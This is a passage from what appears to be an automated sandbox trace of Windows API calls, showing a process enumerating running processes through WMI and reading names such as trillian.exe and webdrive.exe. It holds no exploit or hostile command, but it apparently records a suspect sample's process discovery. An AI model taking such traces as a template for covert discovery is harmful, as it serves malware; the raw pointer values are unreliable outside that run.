IUnknown:Release (This=0x5ebcd18) returned 0x3 [0225.541] IUnknown:Release (This=0x5ebcd18) returned 0x2 [0225.541] CoTaskMemFree (pv=0x5eca5c8) [0225.542] CoGetContextToken (in: pToken=0x36eeb4 | out: pToken=0x36eeb4) returned 0x0 [0225.542] IUnknown:AddRef (This=0x5ebcd18) returned 0x3 [0225.542] IWbemClassObject:Get (in: This=0x5ebcd18, wszName="__GENUS", lFlags=0, pVal=0x36f1b4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36f234*=0, plFlavor=0x36f230*=0 | out: pVal=0x36f1b4*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x36f234*=3, plFlavor=0x36f230*=64) returned 0x0 [0225.542] IWbemClassObject:Get (in: This=0x5ebcd18, wszName="__PATH", lFlags=0, pVal=0x36f198*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36f21c*=0, plFlavor=0x36f218*=0 | out: pVal=0x36f198*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2328\"", varVal2=0x0), pType=0x36f21c*=8, plFlavor=0x36f218*=64) returned 0x0 [0225.542] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2328\"") returned 0x66 [0225.542] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2328\"") returned 0x66 [0225.542] CoGetObjectContext (in: riid=0x2414360*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36f1c4 | out: ppv=0x36f1c4*=0x6ee4bc) returned 0x0 [0225.542] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6ee4bc, pAptType=0x36f1bc | out: pAptType=0x36f1bc*=1) returned 0x0 [0225.542] IUnknown:QueryInterface (in: This=0x6ee4bc, riid=0x2414348*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x36f1c0 | out: ppvObject=0x36f1c0*=0x0) returned 0x80004002 [0225.542] IUnknown:Release (This=0x6ee4bc) returned 0x1 [0225.543] CoGetClassObject (in: rclsid=0x761ab4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36eb30 | out: ppv=0x36eb30*=0x5eca5c8) returned 0x0 [0225.543] WbemDefPath:IUnknown:QueryInterface (in: This=0x5eca5c8, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36ed48 | out: ppvObject=0x36ed48*=0x0) returned 0x80004002 [0225.543] WbemDefPath:IClassFactory:CreateInstance (in: This=0x5eca5c8, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36ed54 | out: ppvObject=0x36ed54*=0x5ec2928) returned 0x0 [0225.543] WbemDefPath:IUnknown:Release (This=0x5eca5c8) returned 0x0 [0225.543] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ec2928, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e974 | out: ppvObject=0x36e974*=0x5ec2928) returned 0x0 [0225.543] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ec2928, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e928 | out: ppvObject=0x36e928*=0x0) returned 0x80004002 [0225.544] WbemDefPath:IUnknown:AddRef (This=0x5ec2928) returned 0x3 [0225.544] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ec2928, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e284 | out: ppvObject=0x36e284*=0x0) returned 0x80004002 [0225.544] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ec2928, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e234 | out: ppvObject=0x36e234*=0x0) returned 0x80004002 [0225.544] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ec2928, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e240 | out: ppvObject=0x36e240*=0x5eca5d8) returned 0x0 [0225.544] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5eca5d8, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36e248 | out: pCid=0x36e248*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0225.544] WbemDefPath:IUnknown:Release (This=0x5eca5d8) returned 0x3 [0225.544] CoGetContextToken (in: pToken=0x36e2a0 | out: pToken=0x36e2a0) returned 0x0 [0225.544] CoGetContextToken (in: pToken=0x36e6b4 | out: pToken=0x36e6b4) returned 0x0 [0225.544] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ec2928, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e734 | out: ppvObject=0x36e734*=0x0) returned 0x80004002 [0225.544] WbemDefPath:IUnknown:Release (This=0x5ec2928) returned 0x2 [0225.544] WbemDefPath:IUnknown:Release (This=0x5ec2928) returned 0x1 [0225.544] CoGetContextToken (in: pToken=0x36f044 | out: pToken=0x36f044) returned 0x0 [0225.544] CoGetContextToken (in: pToken=0x36efa4 | out: pToken=0x36efa4) returned 0x0 [0225.544] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ec2928, riid=0x36f074*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x36f070 | out: ppvObject=0x36f070*=0x5ec2928) returned 0x0 [0225.544] WbemDefPath:IUnknown:AddRef (This=0x5ec2928) returned 0x3 [0225.544] WbemDefPath:IUnknown:Release (This=0x5ec2928) returned 0x2 [0225.544] WbemDefPath:IWbemPath:SetText (This=0x5ec2928, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2328\"") returned 0x0 [0225.544] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f1f0 | out: puCount=0x36f1f0*=0x2) returned 0x0 [0225.544] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1ec*=0x0, pszText=0x0 | out: puBuffLength=0x36f1ec*=0xf, pszText=0x0) returned 0x0 [0225.545] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1ec*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f1ec*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0225.545] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f1bc | out: puCount=0x36f1bc*=0x2) returned 0x0 [0225.545] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1b8*=0x0, pszText=0x0 | out: puBuffLength=0x36f1b8*=0xf, pszText=0x0) returned 0x0 [0225.545] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1b8*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f1b8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0225.545] IWbemClassObject:Get (in: This=0x5ebcd18, wszName="Name", lFlags=0, pVal=0x36f1b8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26f7d7c*=0, plFlavor=0x26f7d80*=0 | out: pVal=0x36f1b8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="trillian.exe", varVal2=0x0), pType=0x26f7d7c*=8, plFlavor=0x26f7d80*=0) returned 0x0 [0225.545] SysStringByteLen (bstr="trillian.exe") returned 0x18 [0225.545] SysStringByteLen (bstr="trillian.exe") returned 0x18 [0225.545] IWbemClassObject:Get (in: This=0x5ebcd18, wszName="Name", lFlags=0, pVal=0x36f1c0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26f7d7c*=8, plFlavor=0x26f7d80*=0 | out: pVal=0x36f1c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="trillian.exe", varVal2=0x0), pType=0x26f7d7c*=8, plFlavor=0x26f7d80*=0) returned 0x0 [0225.545] SysStringByteLen (bstr="trillian.exe") returned 0x18 [0225.545] SysStringByteLen (bstr="trillian.exe") returned 0x18 [0225.545] CoTaskMemAlloc (cb=0x4) returned 0x5eca608 [0225.545] IEnumWbemClassObject:Next (in: This=0x70f9f0, lTimeout=-1, uCount=0x1, apObjects=0x5eca608, puReturned=0x26dde18 | out: apObjects=0x5eca608*=0x5ebceb0, puReturned=0x26dde18*=0x1) returned 0x0 [0225.574] IUnknown:QueryInterface (in: This=0x5ebceb0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e81c | out: ppvObject=0x36e81c*=0x5ebceb0) returned 0x0 [0225.574] IUnknown:QueryInterface (in: This=0x5ebceb0, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e7d0 | out: ppvObject=0x36e7d0*=0x0) returned 0x80004002 [0225.574] IUnknown:QueryInterface (in: This=0x5ebceb0, riid=0x71e41e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36e5f8 | out: ppvObject=0x36e5f8*=0x0) returned 0x80004002 [0225.574] IUnknown:AddRef (This=0x5ebceb0) returned 0x3 [0225.574] IUnknown:QueryInterface (in: This=0x5ebceb0, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e12c | out: ppvObject=0x36e12c*=0x0) returned 0x80004002 [0225.574] IUnknown:QueryInterface (in: This=0x5ebceb0, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e0dc | out: ppvObject=0x36e0dc*=0x0) returned 0x80004002 [0225.574] IUnknown:QueryInterface (in: This=0x5ebceb0, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e0e8 | out: ppvObject=0x36e0e8*=0x5ebceb4) returned 0x0 [0225.574] IMarshal:GetUnmarshalClass (in: This=0x5ebceb4, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36e0f0 | out: pCid=0x36e0f0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0225.574] IUnknown:Release (This=0x5ebceb4) returned 0x3 [0225.575] CoGetContextToken (in: pToken=0x36e148 | out: pToken=0x36e148) returned 0x0 [0225.575] CoGetContextToken (in: pToken=0x36e55c | out: pToken=0x36e55c) returned 0x0 [0225.575] IUnknown:QueryInterface (in: This=0x5ebceb0, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e5dc | out: ppvObject=0x36e5dc*=0x0) returned 0x80004002 [0225.575] IUnknown:Release (This=0x5ebceb0) returned 0x2 [0225.575] CoGetContextToken (in: pToken=0x36eb44 | out: pToken=0x36eb44) returned 0x0 [0225.575] CoGetContextToken (in: pToken=0x36eaa4 | out: pToken=0x36eaa4) returned 0x0 [0225.575] IUnknown:QueryInterface (in: This=0x5ebceb0, riid=0x36eb74*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x36eb70 | out: ppvObject=0x36eb70*=0x5ebceb0) returned 0x0 [0225.575] IUnknown:AddRef (This=0x5ebceb0) returned 0x4 [0225.575] IUnknown:Release (This=0x5ebceb0) returned 0x3 [0225.575] IUnknown:Release (This=0x5ebceb0) returned 0x2 [0225.575] CoTaskMemFree (pv=0x5eca608) [0225.575] CoGetContextToken (in: pToken=0x36eeb4 | out: pToken=0x36eeb4) returned 0x0 [0225.575] IUnknown:AddRef (This=0x5ebceb0) returned 0x3 [0225.575] IWbemClassObject:Get (in: This=0x5ebceb0, wszName="__GENUS", lFlags=0, pVal=0x36f1b4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36f234*=0, plFlavor=0x36f230*=0 | out: pVal=0x36f1b4*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x36f234*=3, plFlavor=0x36f230*=64) returned 0x0 [0225.576] IWbemClassObject:Get (in: This=0x5ebceb0, wszName="__PATH", lFlags=0, pVal=0x36f198*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36f21c*=0, plFlavor=0x36f218*=0 | out: pVal=0x36f198*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2336\"", varVal2=0x0), pType=0x36f21c*=8, plFlavor=0x36f218*=64) returned 0x0 [0225.576] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2336\"") returned 0x66 [0225.576] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2336\"") returned 0x66 [0225.576] CoGetObjectContext (in: riid=0x2414360*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36f1c4 | out: ppv=0x36f1c4*=0x6ee4bc) returned 0x0 [0225.576] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6ee4bc, pAptType=0x36f1bc | out: pAptType=0x36f1bc*=1) returned 0x0 [0225.576] IUnknown:QueryInterface (in: This=0x6ee4bc, riid=0x2414348*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x36f1c0 | out: ppvObject=0x36f1c0*=0x0) returned 0x80004002 [0225.576] IUnknown:Release (This=0x6ee4bc) returned 0x1 [0225.577] CoGetClassObject (in: rclsid=0x761ab4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36eb30 | out: ppv=0x36eb30*=0x5eca608) returned 0x0 [0225.577] WbemDefPath:IUnknown:QueryInterface (in: This=0x5eca608, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36ed48 | out: ppvObject=0x36ed48*=0x0) returned 0x80004002 [0225.577] WbemDefPath:IClassFactory:CreateInstance (in: This=0x5eca608, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36ed54 | out: ppvObject=0x36ed54*=0x5ec2a08) returned 0x0 [0225.577] WbemDefPath:IUnknown:Release (This=0x5eca608) returned 0x0 [0225.577] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ec2a08, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e974 | out: ppvObject=0x36e974*=0x5ec2a08) returned 0x0 [0225.577] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ec2a08, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e928 | out: ppvObject=0x36e928*=0x0) returned 0x80004002 [0225.577] WbemDefPath:IUnknown:AddRef (This=0x5ec2a08) returned 0x3 [0225.577] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ec2a08, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e284 | out: ppvObject=0x36e284*=0x0) returned 0x80004002 [0225.577] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ec2a08, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e234 | out: ppvObject=0x36e234*=0x0) returned 0x80004002 [0225.578] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ec2a08, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e240 | out: ppvObject=0x36e240*=0x5eca618) returned 0x0 [0225.578] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5eca618, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36e248 | out: pCid=0x36e248*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0225.578] WbemDefPath:IUnknown:Release (This=0x5eca618) returned 0x3 [0225.578] CoGetContextToken (in: pToken=0x36e2a0 | out: pToken=0x36e2a0) returned 0x0 [0225.578] CoGetContextToken (in: pToken=0x36e6b4 | out: pToken=0x36e6b4) returned 0x0 [0225.578] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ec2a08, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e734 | out: ppvObject=0x36e734*=0x0) returned 0x80004002 [0225.578] WbemDefPath:IUnknown:Release (This=0x5ec2a08) returned 0x2 [0225.578] WbemDefPath:IUnknown:Release (This=0x5ec2a08) returned 0x1 [0225.578] CoGetContextToken (in: pToken=0x36f044 | out: pToken=0x36f044) returned 0x0 [0225.578] CoGetContextToken (in: pToken=0x36efa4 | out: pToken=0x36efa4) returned 0x0 [0225.578] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ec2a08, riid=0x36f074*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x36f070 | out: ppvObject=0x36f070*=0x5ec2a08) returned 0x0 [0225.578] WbemDefPath:IUnknown:AddRef (This=0x5ec2a08) returned 0x3 [0225.578] WbemDefPath:IUnknown:Release (This=0x5ec2a08) returned 0x2 [0225.578] WbemDefPath:IWbemPath:SetText (This=0x5ec2a08, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2336\"") returned 0x0 [0225.578] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f1f0 | out: puCount=0x36f1f0*=0x2) returned 0x0 [0225.578] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1ec*=0x0, pszText=0x0 | out: puBuffLength=0x36f1ec*=0xf, pszText=0x0) returned 0x0 [0225.578] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1ec*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f1ec*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0225.578] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f1bc | out: puCount=0x36f1bc*=0x2) returned 0x0 [0225.578] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1b8*=0x0, pszText=0x0 | out: puBuffLength=0x36f1b8*=0xf, pszText=0x0) returned 0x0 [0225.578] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1b8*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f1b8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0225.578] IWbemClassObject:Get (in: This=0x5ebceb0, wszName="Name", lFlags=0, pVal=0x36f1b8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26f85f0*=0, plFlavor=0x26f85f4*=0 | out: pVal=0x36f1b8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="webdrive.exe", varVal2=0x0), pType=0x26f85f0*=8, plFlavor=0x26f85f4*=0) returned 0x0 [0225.578] SysStringByteLen (bstr="webdrive.exe") returned 0x18 [0225.579] SysStringByteLen (bstr="webdrive.exe") returned 0x18 [0225.579] IWbemClassObject:Get (in: This=0x5ebceb0, wszName="Name", lFlags=0, pVal=0x36f1c0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26f85f0*=8, plFlavor=0x26f85f4*=0 | out: pVal=0x36f1c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="webdrive.exe", varVal2=0x0), pType=0x26f85f0*=8, plFlavor=0x26f85f4*=0) returned 0x0 [0225.579] SysStringByteLen (bstr="webdrive.exe") returned 0x18 [0225.579] SysStringByteLen (bstr="webdrive.exe") returned 0x18 [0225.579] CoTaskMemAlloc (cb=0x4) returned 0x5eca648 [0225.579] IEnumWbemClassObject:Next (in: This=0x70f9f0, lTimeout=-1, uCount=0x1, apObjects=0x5eca648, puReturned=0x26dde18 | out: apObjects=0x5eca648*=0x5ebd048, puReturned=0x26dde18*=0x1) returned 0x0 [0225.580] IUnknown:QueryInterface (in: This=0x5ebd048, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e81c | out: ppvObject=0x36e81c*=0x5ebd048) returned 0x0 [0225.580] IUnknown:QueryInterface (in: This=0x5ebd048, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e7d0 | out: ppvObject=0x36e7d0*=0x0) returned 0x80004002 [0225.580] IUnknown:QueryInterface (in: This=0x5ebd048, riid=0x71e41e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36e5f8 | out: ppvObject=0x36e5f8*=0x0) returned 0x80004002 [0225.580] IUnknown:AddRef (This=0x5ebd048) returned 0x3 [0225.580] IUnknown:QueryInterface (in: This=0x5ebd048, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e12c | out: ppvObject=0x36e12c*=0x0) returned 0x80004002 [0225.580] IUnknown:QueryInterface (in: This=0x5ebd048, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e0dc | out: ppvObject=0x36e0dc*=0x0) returned 0x80004002 [0225.581] IUnknown:QueryInterface (in: This=0x5ebd048, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e0e8 | out: ppvObject=0x36e0e8*=0x5ebd04c) returned 0x0 [0225.581] IMarshal:GetUnmarshalClass (in: This=0x5ebd04c, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36e0f0 | out: pCid=0x36e0f0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, 